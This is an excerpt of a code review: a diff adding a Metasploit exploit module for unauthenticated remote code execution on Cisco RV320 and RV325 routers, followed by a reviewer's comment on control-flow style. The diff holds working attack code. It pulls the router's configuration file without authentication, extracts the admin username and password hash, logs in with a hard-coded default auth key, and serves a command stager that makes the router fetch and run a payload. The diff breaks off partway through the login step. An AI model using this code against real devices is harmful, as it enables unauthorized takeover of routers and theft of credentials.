modules/exploits/linux/http/cisco_rv32x_rce.rb

```diff
@@ -0,0 +1,164 @@
+unauthenticated remote code execution on Cisco RV320 and RV325 small business
+routers. Can be exploited via the WAN interface of the router. Either via HTTPS
+on port 443 or HTTP on port 8007 on some older firmware versions.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'RedTeam Pentesting GmbH','Benjamin Grap' ],
+      'References'     => [
+          [ 'CVE','2019-1653' ],
+          [ 'CVE','2019-1652' ],
+          [ 'EDB','46243' ],
+          [ 'BID','106728' ],
+          [ 'BID','106732' ],
+          [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ],
+          [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ]
+      ],
+      'Platform'       => 'linux',
+      'Targets'        =>
+        [
+         [ 'LINUX MIPS64',
+          {
+           'Platform' => 'linux',
+           'Arch'     => ARCH_MIPS64
+          }
+         ]
+        ],
+      'Payload'        =>
+        {
+         'BadChars' => ""
+        },
+      'CmdStagerFlavor' => [ 'bourne' ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Sep 9 2018",
+      'DefaultTarget'  => 0))
+
+    register_options([
+      Opt::RPORT(8007), # port of Cisco webinterface
+      OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),
+      OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15])
+    ])
+  end
+
+  def execute_command(cmd, opts = {})
+    # use generated payload, we don't have to do anything here
+  end
+
+  def autofilter
+    true
+  end
+
+  def on_request_uri(cli, req)
+    print_status("#{peer} - Payload request received: #{req.uri}")
+    @cmdstager = generate_cmdstager().join(';')
+    send_response(cli, "#{@cmdstager}")
+  end
+
+  def primer
+    payload_url = get_uri
+    print_status("Downloading configuration from #{peer}")
+    res = send_request_cgi({'uri'=>normalize_uri("cgi-bin","config.exp")})
+    if res and res.code == 200
+      print_status("Successfully downloaded config")
+      username = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1]
+      pass = res.body.match(/^PASSWD=(\h+)/)[1]
+      print_status("Got MD5-Hash: #{pass}")
+      print_status("Loging in as user #{username} using password hash.")
+      print_status("Using default auth_key 1964300002")
+      res2 = send_request_cgi({
+        'uri' => normalize_uri("cgi-bin","userLogin.cgi"),
+        'method' => 'POST',
+        'data' => "login=true&portalname=CommonPortal&password_expired=0&auth_key=1964300002&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password="
+      })
+      if res2 and res2.code == 200
```

Comment:
Almost the entirety of the method is wrapped in a single `if res and res.code == 200` conditional and would benefit from "return early, return often" style.